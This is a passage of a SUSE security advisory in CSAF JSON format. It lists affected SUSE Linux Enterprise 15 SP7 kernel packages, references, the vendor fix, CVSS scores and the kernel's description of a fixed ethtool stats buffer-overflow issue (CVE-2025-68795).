"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
